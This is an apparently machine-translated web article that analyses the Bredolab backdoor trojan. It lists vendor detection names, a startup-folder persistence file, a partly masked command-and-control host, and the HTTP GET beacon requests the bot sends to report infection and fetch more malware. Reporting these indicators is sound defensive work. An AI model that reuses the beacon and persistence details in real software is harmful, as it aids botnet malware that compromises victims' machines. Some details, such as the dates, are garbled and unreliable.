HomeSystemVirus Removal - Spyware

Learn about Backdoor.Win32.Bredolab.eua malware

QuanTriMang.com - The concept of backdoor is used to refer to malicious software, created to install and distribute malicious code to the user's computer . In terms of functions and techniques, the Backdoor is quite similar to the software management and coordination system. These malicious applications were created to do whatever the hackers wanted: to send and receive data, activate, use and delete any file, display error messages, and restart automatically. computer …

Such programs are often used to link infected computer groups to create common botnet or zombie models. And the people behind this organization can easily gather a large or large number of computers - this has now become a tool for hackers, in order to carry out bad schemes or purposes.

Another Backdoor unit is also capable of spreading and acting exactly like the Net-Worm, we can distinguish them through the ability to spread, Backdoor cannot replicate and spread, in stark contrast to Net-Worm. But just by receiving a special command from the hackers, they will simultaneously spread and produce in an uncontrollable amount.

In this article, we will discuss Backdoor.Win32.Bredolab.eua (named by Kaspersky), or also known as:

- Trojan: Bredolab! N (McAfee)
- Mal / BredoPk-B (Sophos)
- Trj / Sinowal.DW (Panda)
- TrojanDownloader: Win32 / Bredolab.AA (MS (OneCare))
- Trojan.Botnetlog.126 (DrWeb)
- Win32 / TrojanDownloader.Bredolab.BE trojan (Nod32)
- Trojan.Downloader.Bredolab.EK (BitDef7)
- Backdoor.Bredolab.CNS (VirusBuster)
- Trojan.Win32.Bredolab (Ikarus)
- Cryptic.AGF (AVG)
- TR / Crypt.XPACK.Gen (AVIRA)
- W32 / Bredolab.TP (Norman)
- Trojan.Win32.Generic.521C7EF8 (Rising)
- Backdoor.Win32.Bredolab.eua [AVP] (FSecure)
- Trojan-Downloader.Win32.Bredolab (Sunbelt)
- Backdoor.Bredolab.CNS (VirusBusterBeta)

They were discovered on June 3, 2010 at 16:16 GMT, the 'move' operated at 4/6/2010 at 3:28 GMT, and detailed analysis information was posted on 12/12 7/2010 at 11:33 GMT.

Detailed technical description

In essence, malicious programs like this are often managed by a private server, and are responsible for downloading other malware to the infected computer.

Like all other malicious programs, they activate the same boot mechanism by copying the executable file to the autorun folder:

% Startup% siszpe32.exe

and create files that look like this:

% appdata% avdrn.dat

Regarding the Payload method, they often connect to the server:

http:///*****lo.ru

where they send the following requests:

GET /new/controller.php?action=bot&entity_list=&
uid = & first = 1 & guid = 880941764 & v = 15 & rnd = 8520045

As a result, the program will receive specific commands and codes to download other malware applications, they will be saved in the following folder and automatically activated:

% windir% Temp.exe

Then they continue to send other requests:

GET /new/controller.php?
action = report & guid = 0 & rnd = 8520045 & guid = & entity = 1260187840: unique_start;
1260188029: unique_start; 1260433697: unique_start; 1260199741: unique_start

These data inform the server system that the victim's computer has been infected.

4 ★ | 1 Vote
learninformationvirusmalwareBackdoorWin32

You should read it

May be interested

  • Learn about Pumas extortion softwareLearn about Pumas extortion software
    this article will provide you with basic information about pumas malware, as well as ways to help you completely remove this malware.
  • What is rooting malware? What can you do to protect yourself?What is rooting malware? What can you do to protect yourself?
    rooting malware works by gaining root access to the victim's phone. this gives the malware more control over the phone.
  • Some simple tricks to deal with MalwareSome simple tricks to deal with Malware
    malware seems to become more and more intelligent and causes more incalculable consequences than before. installing malware detection tools (malwarebytes, hijackthis, combofix ...) on the computer is not a redundant task. but in some cases, for many reasons (blocked by malware itself) these tools are
  • What is Malware Joker? How to fight Malware Joker?What is Malware Joker? How to fight Malware Joker?
    joker malware is another threat to your privacy and sensitive information. recently, it attacked android mobile devices globally, resulting in the need to remove some applications from the google play store.
  • 5 types of malware on Android5 types of malware on Android
    malware or malware can affect mobile devices as well as computers. a little bit of knowledge and proper precautions can protect you from threats like ransomware and sextortion scam.
  • Modular Malware - New stealth attack method to steal dataModular Malware - New stealth attack method to steal data
    some malware variants can use different modules to change the way they affect the target system. so what is modular malware and how does it work?
  • What is malware analysis? How are the steps taken?What is malware analysis? How are the steps taken?
    what is malware analysis? in what situations do we need to conduct malware analysis? how is the malware analysis process implemented?
  • Protect the computer from malwareProtect the computer from malware
    there are many tools on the market today that allow users to know if a website is safe to access. we will learn how they work and where they appear.
  • Binder and Malware (Part 3)Binder and Malware (Part 3)
    in the previous two sections we have configured and built the malware with binder yab. now will observe and execute this malware. in the perspective we will begin to implement what this executed piece of malware looks like and the behavior of n
  • 5 signs of computer infection with malware5 signs of computer infection with malware
    users should guard against malware when they see too many pop-up pages appear or some customizations are suddenly changed.

Virus Removal - Spyware